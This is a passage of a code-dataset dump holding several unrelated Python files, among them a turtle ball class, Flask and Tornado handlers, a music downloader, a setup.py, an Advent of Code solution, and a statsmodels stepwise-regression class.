'test_predict', name) + \".{}.png\".format(output_suffix)\n cv2.imwrite(filename, img)\n print(\"wrote : {}\".format(filename))\n\n else:\n exit(help)\n","sub_path":"pspnet-4class.py","file_name":"pspnet-4class.py","file_ext":"py","file_size_in_byte":30320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"266078300","text":"\nimport turtle\nfrom turtle import Turtle\n\n\nclass Ball(Turtle):\n\t\"\"\"docstring for Ball\"\"\"\n\tdef __init__(self, x, y ,dx, dy,r, color):\n\t\tTurtle.__init__(self)\n\t\tself.penup()\n\t\tself.goto(x, y)\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.dx = dx\n\t\tself.dy = dy\n\t\tself.r = 
r\n\t\tself.color(color)\n\t\tself.shape(\"circle\")\n\t\tself.shapesize(r/10)\n\t\tself.showturtle()\n\tdef move(self,screen_width, screen_height):\n\t\t\tcurrent_x = self.xcor()\n\t\t\tnew_x = current_x + self.dx\n\t\t\tcurrent_y = self.ycor()\n\t\t\tnew_y = current_y + self.dy\n\t\t\tright_ball_side = new_x + self.r\n\t\t\tleft_ball_side = new_x - self.r\n\t\t\tup_ball_side = new_y + self.r\n\t\t\tdown_ball_side = new_y - self.r\n\t\t\tself.goto(new_x,new_y)\n\t\t\tif screen_height <= up_ball_side :\n\t\t\t\tself.dy = -self.dy\n\t\t\telif -screen_height >= down_ball_side:\n\t\t\t\tself.dy = -self.dy\n\t\t\telif -screen_width >= left_ball_side:\n\t\t\t\tself.dx = -self.dx\n\t\t\telif screen_width <= right_ball_side:\n\t\t\t\tself.dx = -self.dx\n\n\t\t\t\n\n'''my_ball = Ball(0,0,2,2,50,\"red\")\nwhile True:\n\tmy_ball.move(200,200)\nturtle.mainloop()'''\n\t\t","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"334300222","text":"# coding: utf-8\nfrom google.appengine.ext import blobstore\nfrom werkzeug.http import parse_options_header\nfrom flask import Blueprint, render_template, url_for, request, redirect, abort\nfrom apps.file.models import File\nfrom auth import current_user_key, admin_required\nfrom apps.file.utils import check_owner\nfrom apps.file.admins.forms import FileForm\n\nmod = Blueprint(\n 'admins.file',\n __name__,\n url_prefix='/admins/file',\n template_folder='templates'\n)\n\n\ndef file_from_upload():\n try:\n uploaded_file = request.files['file']\n except:\n return None\n headers = uploaded_file.headers['Content-Type']\n blob_info_key = parse_options_header(headers)[1]['blob-key']\n blob_info = blobstore.BlobInfo.get(blob_info_key)\n\n file_ = File(\n owner_key=current_user_key(),\n blob_key=blob_info.key(),\n filename=blob_info.filename,\n content_type=blob_info.content_type,\n size=blob_info.size\n )\n file_.put()\n return file_\n\n\n@mod.route('/', methods=['GET', 'POST'], endpoint='index')\n@admin_required\ndef index():\n if request.method == 'POST':\n file_from_upload()\n return redirect(url_for('admins.file.index'))\n files = File.query(File.owner_key==current_user_key()).order(-File.created)\n return render_template(\n 'file/admins/index.html',\n files=files,\n upload_url=blobstore.create_upload_url(url_for('admins.file.index'))\n )\n\n@mod.route('/delete/<int:file_id>/', methods=['POST'], endpoint='delete')\n@admin_required\ndef file_delete(file_id):\n file_ = File.get_by_id(file_id)\n if not file_:\n abort(404)\n if not check_owner(file_):\n abort(403)\n file_.key.delete()\n return redirect(url_for('admins.file.index'))\n\n@mod.route('/edit/<int:file_id>/', methods=['GET', 'POST'])\n@admin_required\ndef edit(file_id):\n file_ = File.get_by_id(file_id)\n if not file_:\n abort(404)\n if not check_owner(file_):\n abort(403)\n form = FileForm(obj=file_)\n if request.method == 'POST' and form.validate_on_submit():\n if 'save' in request.form:\n form.populate_obj(file_)\n file_.put()\n if 'delete' in request.form:\n file_.key.delete()\n return redirect(url_for('admins.file.index'))\n return render_template('file/admins/edit.html', form=form, file_=file_)\n","sub_path":"apps/file/admins/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"2977791","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom html.parser import 
HTMLParser\nfrom urllib.parse import urlparse\nimport urllib.request\nimport urllib.parse\nimport html\n\nclass AlbumHTMLParser(HTMLParser):\n def __init__(self):\n self.next_url = None\n self.music_files = set()\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n attrs_d = dict(attrs)\n href = attrs_d.get('href')\n if href is not None:\n ext = href[href.rfind('.') + 1:]\n if ext in ['mp3', 'flac', 'm4a', 'ogg']:\n self.music_files.add(href)\n\ndef main():\n album_url = sys.argv[1]\n album_parser = AlbumHTMLParser()\n req = urllib.request.urlopen(album_url)\n album_parser.feed(req.read().decode('utf-8'))\n url_parsed = urlparse(req.geturl())\n domain = '%s://%s' % (url_parsed.scheme, url_parsed.netloc)\n # Despite the extension, these '.mp3' paths are HTML documents.\n for track in sorted(album_parser.music_files):\n track_parser = AlbumHTMLParser()\n if track.startswith('/'):\n track = domain + track\n req = urllib.request.urlopen(track)\n track_parser.feed(req.read().decode('utf-8'))\n for track_file in sorted(track_parser.music_files):\n req = urllib.request.urlopen(track_file)\n track_url_parsed = urlparse(req.geturl())\n music_filename = urllib.parse.unquote(os.path.basename(track_url_parsed.path))\n print(music_filename)\n music_fp = open(music_filename, 'wb')\n music_fp.write(req.read())\n with open('khinsider.txt', 'w') as txt_fp:\n txt_fp.write(album_url + '\\n')\n\nif __name__ == '__main__':\n main()\n","sub_path":"khinsider_download.py","file_name":"khinsider_download.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599506001","text":"#!/usr/bin/env python\n'''\nCopyright 2017, United States Government, as represented by the Administrator of the National Aeronautics and Space Administration. All rights reserved.\n\nThe pyCMR platform is licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0.\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License.\n\n'''\nimport os\nfrom codecs import open\nfrom setuptools import setup, find_packages\n\nlongDescription = \"\"\"pyCMR\n===========\n\n\n * Created by: Manil Maskey (2016)\n * License:\n\n----\n\n~~~~~~~~~~~~\nRequirements\n~~~~~~~~~~~~\n\n * Python 2.7/3.2+\"\"\"\n\nhere = os.path.abspath(os.path.dirname(__file__))\n__version__ = '0.1.2'\n\n# get the dependencies and installs\nwith open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n all_reqs = f.read().split('\\n')\n\ninstall_requires = [x.strip() for x in all_reqs if 'git+' not in x]\ndependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' in x]\n\n\nsetup(\n name='pyCMR',\n version=__version__,\n author='Abdelhak Marouane',\n author_email='am0089@uah.edu',\n description='client API to ingest using CMR API',\n long_description=longDescription,\n url='https://github.com/nasa-cumulus/cmr',\n license='',\n classifiers=[\n 'Framework :: Pytest',\n 'Topic :: Scientific/Engineering :: GIS',\n 'Topic :: Scientific/Engineering',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: Freeware',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n ],\n packages=find_packages(exclude=['docs', 'tests*']),\n include_package_data=True,\n install_requires=install_requires,\n dependency_links=dependency_links,\n setup_requires=['pytest-runner'],\n tests_require=['pytest']\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"518472732","text":"from aocd import data\nimport numpy as np\nfrom aoc_wim.ocr import AOCR\n\nrows, cols = 6, 25\na = np.fromiter(data, int).reshape((-1, rows, cols))\nlayer = min(a, key=lambda v: (v == 0).sum())\nprint((layer == 1).sum() * (layer == 2).sum())\n\nimg = np.ones_like(layer) * 2\nfor layer in a:\n np.copyto(img, layer, where=(img == 2))\n\ntxt = AOCR[img]\nprint(txt)\n","sub_path":"aoc_wim/aoc2019/q08.py","file_name":"q08.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"158468028","text":"#-*- coding:utf-8 -*-\n\nfrom tornado.web import HTTPError\nfrom sqlalchemy.exc import DataError, IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom distreet.models.store import Store\nfrom distreet.models.item import Item, Category\nfrom distreet.utils.photo import PhotoUploader\nfrom distreet.handlers.base import APIRequestHandler\nfrom distreet.tasks.search import index\nfrom distreet.tasks.photo import resize\n\n\nclass PutRequestHandler(APIRequestHandler):\n\n def post(self):\n success = False\n try:\n name = self.get_argument('name')\n category = self.get_argument('category')\n store = self.get_argument('store')\n except HTTPError:\n return self.finish({'success': success})\n try:\n cid = category.split('|')[0]\n sid = store.split('|')[0]\n if not name:\n raise ValueError\n cid = int(cid)\n sid = int(sid)\n except (ValueError, TypeError):\n return self.finish({'success': success})\n item = Item(\n name=name, category_id=cid,\n )\n item.store_id = sid\n try:\n price = float(self.get_argument('price', .00))\n except ValueError:\n price = .00\n try:\n item_id = int(self.get_argument('id', 0))\n except (TypeError, ValueError):\n item_id = 0\n if item_id:\n 
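# reuse the id supplied by the client as the item's primary key\n 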
item.id = item_id\n item.price = price\n item.photo_ids = ''\n item.full_name = self.get_argument('full_name', item.name)\n item.detail = self.get_argument('detail', '')\n session = self.application.backend.get_session()\n try:\n try:\n item.store = session.query(Store).filter(\n Store.id == item.store_id).one()\n item.category = session.query(Category).filter(\n Category.id == item.category_id).one()\n except NoResultFound:\n raise DataError\n photo_uploader = PhotoUploader(self, **{'ref_type': 'Item'})\n ids = photo_uploader.upload()\n if ids:\n for photo_id in ids:\n resize.delay(photo_id)\n item.photo_ids = ','.join(map(str, ids))\n session.add(item)\n session.commit()\n success = True\n data = {'id': item.id,\n 'name': item.name.encode('utf-8'),\n 'store_id': item.store_id,\n 'category_id': item.category_id,\n 'detail': item.detail.encode('utf-8')}\n index.delay(data, 'distreet.item')\n except (DataError, IntegrityError):\n session.rollback()\n finally:\n session.close()\n\n return self.finish({'success': success})\n\n\nclass ItemListRequestHandler(APIRequestHandler):\n\n def get(self):\n success = False\n try:\n store_id = int(self.get_argument('sid'))\n except (HTTPError, ValueError):\n return self.finish({'success': success})\n\n try:\n limit = int(self.get_argument('limit', 10))\n except ValueError:\n limit = 10\n try:\n offset = int(self.get_argument('offset', 0))\n except ValueError:\n offset = 0\n\n session = self.application.backend.get_session()\n items = session.query(Item).filter(\n Item.store_id == store_id).limit(limit).offset(offset)\n success = True\n data = [{'name': item.name, 'store': item.store.name,\n 'photos': item.arrange_photos(),\n 'id': item.id, 'price': float(item.price)} for item in items]\n session.close()\n return self.finish({'success': success, 'data': data})\n","sub_path":"distreet/handlers/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566603989","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n sortedArray = self.mergeSort(prices)\n \n map = {}\n for x in range(0, len(prices)):\n map[prices[x]] = x\n \n if(map[sortedArray[0]] != len(sortedArray)-1):\n return sortedArray[-1] - sortedArray[0]\n \n def mergeSort(self,unsorted_list: List[int]) -> List[int]:\n if len(unsorted_list) <=1:\n return unsorted_list\n \n middle = len(unsorted_list)// 2\n left_list = unsorted_list[:middle]\n right_list = unsorted_list[middle:]\n \n left_list = self.mergeSort(left_list)\n right_list = self.mergeSort(right_list)\n \n return self.mergeHalves(left_list, right_list)\n \n def mergeHalves(self,left_list: List[int] , right_list: List[int]) -> List[int]:\n res = []\n while len(left_list) > 0 and len(right_list) > 0 :\n if left_list[0] <= right_list[0]:\n res.append(left_list[0])\n left_list.pop(0)\n elif right_list[0] < left_list[0]:\n res.append(right_list[0])\n right_list.pop(0)\n \n if len(left_list) > 0:\n res = res+left_list\n \n elif len(right_list) > 0:\n res = res+right_list\n \n return res\n\n\nprint(Solution.maxProfit([7,1,5,3,6,4]))\n \n \n \n \n \n \n ","sub_path":"MaxProfit.py","file_name":"MaxProfit.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"280395819","text":"from BotGuardInits import *\nfrom JsonSettingsParser import *\nimport telebot\n\nclass BotGuad():\n\n def __init__(self):\n self.settings = 
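The handler above wraps every write in the same commit/rollback/close discipline. A stripped-down sketch of that pattern, where `session` and `obj` stand in for the application's real objects:

from sqlalchemy.exc import DataError, IntegrityError

def save(session, obj):
    try:
        session.add(obj)
        session.commit()
        return True
    except (DataError, IntegrityError):
        session.rollback()   # leave the session usable after a failed write
        return False
    finally:
        session.close()      # always release the connection, success or not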
JsonSettingsParser()\n        self.settings.parse()\n        self.bot = telebot.TeleBot(self.settings.botToken) # token of my bot\n        initFront(self)\n        initBack(self.settings.camIndex)\n        initHandlers(self)\n\n    def run(self):\n        print(\"bot is on\")\n        self.bot.polling(none_stop=True)\n\n","sub_path":"BotGuardClass.py","file_name":"BotGuardClass.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"578467824","text":"def unique(values):\n    \"\"\"\n    The function returns a list of the unique values.\n    Extra challenge: the function returns the unique values in order of first appearance.\n\n    :param values: List of values to check.\n    :type values: list\n    :return: Unique values in order of appearance.\n    :rtype: list\n    \"\"\"\n    lista = []\n    for i in values:\n        if i not in lista:\n            lista.append(i)\n\n    return lista\n\n\nif __name__ == \"__main__\":\n    assert [1, 5, 3, 6, 7, 2, 4] == unique([1, 5, 3, 5, 6, 7, 2, 1, 4, 1, 5])","sub_path":"lab_2/tasks/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185920389","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport logging\nimport argparse\nimport traceback\nfrom collections import defaultdict\nfrom math import sqrt\nsys.path.append('python-tools')\nfrom graph import bron_kerbosch,neighbor\nfrom multiprocessing import Pool\n\nCofAlpha=1.36\nAlpha=0.05\n# Copies of the arguments and graph, shared with each worker process\nargs = None\ngraph = None\ndef init_cxt(xargs, xgraph):\n    global args, graph\n    args = xargs\n    graph = xgraph\n\ndef main():\n    global graph\n    \n    # Number of samples for each client\n    samples = defaultdict(int)\n    for line in args.distinfile:\n        mac, val, freq = map(int, line.rstrip().split())\n        samples[mac] += freq\n\n    # Create graph with initially all connected vertices\n    graph = [[0]*len(samples) for i in range(len(samples))]\n    indexTomac = {}\n    total = 0\n    for line in args.siminfile:\n        chunks = line.rstrip().split()\n        c = int(chunks[0])\n        indexTomac[total] = c\n\n        for i in range(len(chunks)-1):\n            ks,p = map(float,chunks[i+1].split(','))\n            n = samples[indexTomac[i]]\n            np = samples[c]\n            # Null hypothesis rejected (i.e., not the same distribution)\n            if p < Alpha or ks > CofAlpha*sqrt(float(n+np)/float(n*np)):\n                pass\n            else:\n                # Add edge between vertices\n                graph[i][total] = graph[total][i] = 1\n\n        total += 1\n\n    # Remove the clients not in the similarity data\n    graph = [l[:total] for l in graph[:total]]\n    pool = Pool(None, initializer = init_cxt, initargs = (args, graph))\n    for result in pool.imap_unordered(processVertex, range(len(graph))):\n        for clique in result:\n            args.outfile.write(' '.join([str(indexTomac[c]) for c in clique]) + '\\n')\n\ndef processVertex(v):\n    R = {v}  # seed the clique with this single vertex; set(v) would fail on an int\n    P = set(range(len(graph)))\n    X = set()\n    res = []\n    for clique in bron_kerbosch(R, P, X, graph):\n        res.append(clique)\n    return res\n\nif __name__ == \"__main__\":\n    # set up command line args\n    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n            description='Compute similarity statistics between client request distributions')\n    parser.add_argument('distinfile', type=argparse.FileType('r'))\n    parser.add_argument('siminfile', type=argparse.FileType('r'))\n    parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n    parser.add_argument('-q', '--quiet', action='store_true', default=False, help='only print errors')\n    parser.add_argument('-v', 
'--verbose', action='store_true', default=False, help='print debug info. --quiet wins if both are present')\n args = parser.parse_args()\n\n # set up logging\n if args.quiet:\n level = logging.WARNING\n elif args.verbose:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logging.basicConfig(\n format = \"%(levelname) -10s %(asctime)s %(module)s:%(lineno) -7s %(message)s\",\n level = level\n )\n\n main()\n","sub_path":"scripts/group_client_distributions.py","file_name":"group_client_distributions.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590790123","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ = 'TesterCC'\n# __time__ = '17/9/27 00:38'\n\n'''\nPython 2.7 协程 gevent\nhttps://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001407503089986d175822da68d4d6685fbe849a0e0ca35000\n\n实际代码里,我们不会用gevent.sleep()去切换协程,而是在执行到IO操作时,gevent自动切换\n'''\n\nfrom gevent import monkey; monkey.patch_all()\nimport gevent\nimport urllib2\n\n\ndef f(url):\n print('GET: %s' % url)\n resp = urllib2.urlopen(url)\n data = resp.read()\n print('%d bytes received from %s.' % (len(data), url))\n\ngevent.joinall([\n gevent.spawn(f, 'https://www.python.org/'),\n gevent.spawn(f, 'https://www.yahoo.com/'),\n gevent.spawn(f, 'https://github.com/'),\n])","sub_path":"liaoxuefeng/gevent_demo2.py","file_name":"gevent_demo2.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243021283","text":"from pylab import *\nimport numpy as np\nimport sys\n\nInput= sys.argv[1]\nOutput= sys.argv[2]\n\ndata = loadtxt(\"%s\"%Input)\nz = data\n#title('lalal')\ncontourf(z, 40)\ncolorbar()\nsavefig(\"%s\"%Output,dpi=800)\n\n","sub_path":"code/2D_Contour/mkplot.py","file_name":"mkplot.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142789930","text":"# export PATH=/home/yule/anaconda3/bin:$PATH\n\nimport pandas as pd \nimport numpy as np\n\ndf_wine = pd.read_csv('wine.data',header=None)\n\n#print(df_wine.head())\n\n# 划分出测试集和训练集\nfrom sklearn.model_selection import train_test_split\nX,y = df_wine.iloc[:,1:].values, df_wine.iloc[:,0].values\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=0)\n\n#标准化:均值为0,方差为1\nfrom sklearn.preprocessing import StandardScaler\nstdsc = StandardScaler()\nX_train_std = stdsc.fit_transform(X_train)\nX_test_std =stdsc.transform(X_test)\n\n#计算协方差矩阵的特征对\ncov_mat = np.cov(X_train_std.T) #得到协方差矩阵\neigen_vals,eigen_vecs = np.linalg.eig(cov_mat) #得到特征向量,存入13*13的eigen_vecs中\nprint('\\nEigenvalues \\n%s' % eigen_vals)\n'''\nEigenvalues\n[ 4.8923083 2.46635032 1.42809973 1.01233462 0.84906459 0.60181514\n 0.52251546 0.08414846 0.33051429 0.29595018 0.16831254 0.21432212\n 0.2399553 ]\n'''\n\n#绘制特征值的方差贡献率图像\ntot = sum(eigen_vals)\nvar_exp = [(i / tot) for i in sorted(eigen_vals,reverse=True)] #计算每个的方差贡献率\ncum_var_exp = np.cumsum(var_exp) #计算出累计方差\n \nimport matplotlib.pyplot as plt \nplt.bar(range(1,14),var_exp,alpha=0.5,align='center',label='individual explained variance')\nplt.step(range(1,14),cum_var_exp,where='mid',label='cumulative explained variance')\nplt.ylabel('Explained variance ratio')\nplt.xlabel('Principal components')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"Machine Learning - 
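The edge rule in group_client_distributions.py above keeps an edge only when the two-sample KS statistic stays under c(alpha) * sqrt((n+m)/(n*m)), with c(0.05) = 1.36 (the CofAlpha constant). A quick check of what that threshold works out to for a couple of sample sizes:

from math import sqrt

def ks_critical(n, m, c_alpha=1.36):
    # Large-sample critical D value at alpha = 0.05 for samples of size n and m.
    return c_alpha * sqrt((n + m) / (n * m))

print(ks_critical(100, 100))  # ~0.192
print(ks_critical(50, 200))   # ~0.215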
Mofan/Python机器学习-代码/5.1总体方差与贡献方差.py","file_name":"5.1总体方差与贡献方差.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"49243202","text":"import ssl\nssl.PROTOCOL_SSLv23 = ssl.PROTOCOL_TLSv1 # target server accepts only TLSv1\n\nimport datetime, logging, os, queue, sys, requests\nfrom multiprocessing import Process, Queue\n\nfrom config import *\n\ndef ssns_generator(q_ssns):\n logging.info('Starting to put SSNs in the queue.')\n start_date = datetime.date(1990, 7, 1)\n\n for is_female in range(2):\n for day in range(days_max):\n current_date = start_date + datetime.timedelta(day)\n ssn_birthdate = current_date.strftime('%y%m%d')\n\n if is_female:\n ssn_birthdate = str(int(ssn_birthdate) + 5000)\n\n if day % 30 == 0:\n logging.info('Currently at ' + str((day * 100) / days_max) + '%.')\n\n for ssn_order in range(1000):\n ssn_order = '{0:03d}'.format(ssn_order)\n ssn_checkdigit = int(ssn_birthdate + ssn_order) % 11\n\n if ssn_checkdigit == 10:\n continue\n\n q_ssns.put(ssn_birthdate + ssn_order + str(ssn_checkdigit))\n\n logging.info('All requested SSNs were generated.')\n\n\ndef fetcher(q_ssns, q_results):\n logging.info('Fetcher ' + str(os.getpid()) + ' started.')\n s = requests.Session()\n while True:\n try:\n ssn = q_ssns.get(timeout=10)\n except queue.Empty:\n logging.info('Fetcher ' + str(os.getpid()) + ' ended. No jobs available.')\n exit()\n\n login_data['TBrc'] = ssn\n r = s.post(login_url, data=login_data)\n if 'Bpokoj' in r.text:\n r = s.post(info_url, data=info_data)\n user = {\n 'firstname': re_search_return('ljmeno\">(.*?)<', r.text),\n 'lastname': re_search_return('lprijmeni\">(.*?)<', r.text),\n 'ssn': ssn,\n 'building': re_search_return('Lblok\">(.*?)<', r.text),\n 'room': re_search_return('Lpokoj\">(.*?)<', r.text)\n }\n q_results.put(user)\n else:\n continue\n\n\ndef saver(q_results):\n logging.info('Saver ' + str(os.getpid()) + ' started.')\n while True:\n print(q_results.get())\n\n\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n q_ssns = Queue(max_pregenerated_ssns)\n q_results = Queue()\n\n Process(target=ssns_generator, args=(q_ssns,)).start()\n for i in range(fetchers_threads):\n Process(target=fetcher, args=(q_ssns, q_results)).start()\n p_saver = Process(target=saver, args=(q_results,))\n p_saver.start()\n p_saver.join()\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125152522","text":"import re\nimport actions as ac\n\ndef search(querry,list):\n regex = '(^.*' + re.escape(querry) + '.*$)'\n matches=[]\n for element in list:\n z=re.match(regex, element, re.IGNORECASE)\n if z:\n matches.append(z.groups()[0])\n if len(matches)>0:\n return matches\n if len(matches)==0:\n failure_statement=\"no contacts\" #return won't print on shell if given variable\n return failure_statement\n","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"360218119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 18:05:45 2018\n\n@author: charleshen\n\"\"\"\n\nfrom utils.pandastool import ParseDFtypes\nfrom utils.modelbase import ModelBase\n#from dataset import load_MedExp\nfrom io import StringIO\n\nimport statsmodels.api as sm\nimport 
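The explained-variance computation in the wine example above can be condensed into a few lines. A self-contained sketch with synthetic data; np.linalg.eigvalsh is used here because a covariance matrix is symmetric:

import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 5))
X = (X - X.mean(axis=0)) / X.std(axis=0)       # standardise, as StandardScaler does
eigvals = np.linalg.eigvalsh(np.cov(X.T))      # eigenvalues of the covariance matrix
ratios = np.sort(eigvals)[::-1] / eigvals.sum()
print(ratios)              # individual explained-variance ratios
print(np.cumsum(ratios))   # cumulative explained variance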
statsmodels.formula.api as smf\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nimport pandas as pd\n\nimport coloredlogs,logging\ncoloredlogs.install()\n\n\n\n\nclass StepwiseReg(ModelBase):\n\n    \"\"\"\n    Stepwise regression analysis. Takes a dfx (DataFrame) and a dfy (DataFrame), where dfy is a\n    single column of data, and returns the parameters of an ordinary-least-squares linear model\n    as a DataFrame under the 'result' key.\n\n\n    Methods\n    -------\n    get_info :\n        Get this model's information. Returns a dict with the keys 'id', 'name', 'description'\n        and 'limited', meaning respectively: the model's id, its name, its description and its\n        scope of applicability.\n\n    run:\n        Parameters\n        ----------\n        dfx: pandas DataFrame\n            Every column must contain numeric data, not strings or objects.\n\n        dfy: pandas DataFrame\n            The (single) column used must contain numeric data, not strings or objects.\n\n\n        Returns\n        ----------\n        A dict with a 'result' key whose value is a DataFrame of the coef, p, r, VIF and\n        similar statistics.\n\n    \"\"\"\n    \n    \n    \n    def __init__(self, \n                 model_id = None, \n                 model_limiation = None,\n                 ):\n        \n        # store under the attribute names that get_info() actually reads\n        self._id = model_id\n        self._limitation = model_limiation\n\n    \n    \n    def get_info(self):\n        \n        return {'id': self._id, \n                'name': self._name, \n                'description': self._description,\n                'limited':self._limitation\n                }\n    \n    \n    def run(self, \n            dfx, \n            dfy): \n\n        \n        dfy = dfy.reset_index(drop=True)\n        dfx = dfx.reset_index(drop=True) \n        \n        \n        msg = {}\n        \n        xl = len(dfx)\n        yl = len(dfy)\n        if xl != yl:\n            logging.error('the length of input X:%s is not equal to the length of Y: %s ! ' % (xl,yl))\n            msg['error'] = 'the length of input X:%s is not equal to the length of Y: %s ! ' % (xl,yl)\n            return {'result':pd.DataFrame(), 'msg':msg} \n        \n        \n        if len(dfy.columns) != 1:\n            logging.warning('input DataFrame dfy has more than one column, but only the first column will be used!')\n            msg['warning'] = 'input DataFrame dfy has more than one column, but only the first column will be used!'\n            \n            _dfy = dfy[[dfy.columns[0]]]\n            \n        else:\n            _dfy = dfy\n        \n        x_numer_cols, x_cate_cols = ParseDFtypes(dfx)\n        y_numer_cols, y_cate_cols = ParseDFtypes(_dfy)\n\n        if (x_numer_cols ==[]) | (y_numer_cols == []):\n            logging.error('The input DataFrames have no numeric columns, please check your input data!')\n            \n            msg['error'] = 'The input DataFrames have no numeric columns, please check your input data!'\n            dfmain =pd.DataFrame()\n            \n            \n        else:\n            \n            _dfx = dfx[x_numer_cols]\n            X_cols = stepwise_selection(_dfx, _dfy)\n            \n            logging.info('the following variables are selected: %s' % X_cols)\n            \n            dfXS = _dfx[X_cols]\n            \n            X = sm.add_constant(dfXS, prepend=True)\n            y = _dfy\n            \n            f = smf.OLS(y, X).fit()\n            tables = f.summary().tables\n\n            df_list = [pd.read_html(StringIO(t.as_html()))[0] for t in tables ]\n\n            def parse_table02(m_inf):\n                df1 = m_inf[[0,1]]\n                df1.columns=['items','values'] \n                df2 = m_inf[[2,3]]\n                df2.columns=['items','values'] \n                dfinfo1 = df1.append(df2).dropna().set_index('items') \n                return dfinfo1.T\n\n            dfinfo0 = parse_table02(df_list[0])\n            dfinfo2 = parse_table02(df_list[2])\n\n            dfinfo1 = df_list[1].fillna('Variables').set_index(0)\n            dfinfo1 = dfinfo1.T.set_index('Variables').T\n\n            dfmain = dfinfo1[dfinfo1.columns[:4]]\n\n            dfad = dfinfo0[['R-squared:',\n                            'Adj. R-squared:', \n                            'F-statistic:']].join(dfinfo2[['Durbin-Watson:',\n                                                           'Jarque-Bera (JB):',\n                                                           'Omnibus:']])\n\n            variables = f.model.exog\n            dfmain['VIF'] = [variance_inflation_factor(variables, i) for i in range(variables.shape[1])]\n            for i in dfad.columns:\n                dfmain[i] = dfad[i].iloc[0]\n            \n\n        return {'result':dfmain, 'msg':msg}\n    \n    \n    \ndef stepwise_selection(X, y, \n                       initial_list=[], \n                       threshold_in=0.05, \n                       threshold_out = 0.1, \n                       verbose=True):\n    \"\"\" Perform a forward-backward feature selection \n    based on p-value from statsmodels.api.OLS\n    Arguments:\n        X - pandas.DataFrame with candidate features\n        y - list-like with the target\n        initial_list - list of features to start with (column names of X)\n        threshold_in - include a feature if its p-value < threshold_in\n        threshold_out - exclude a feature if its p-value > threshold_out\n        verbose - whether to print the sequence of inclusions and exclusions\n    Returns: list of selected features \n    Always set threshold_in < threshold_out to avoid infinite looping.\n    See https://en.wikipedia.org/wiki/Stepwise_regression for the details\n    \"\"\"\n    included = list(initial_list)\n    while True:\n        changed=False\n        # forward step\n        excluded = list(set(X.columns)-set(included))\n        new_pval = pd.Series(index=excluded)\n        for new_column in excluded:\n            model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included+[new_column]]))).fit()\n            new_pval[new_column] = model.pvalues[new_column]\n        best_pval = new_pval.min()\n        if best_pval < threshold_in:\n            best_feature = new_pval.idxmin()\n            included.append(best_feature)\n            changed=True\n            if verbose:\n                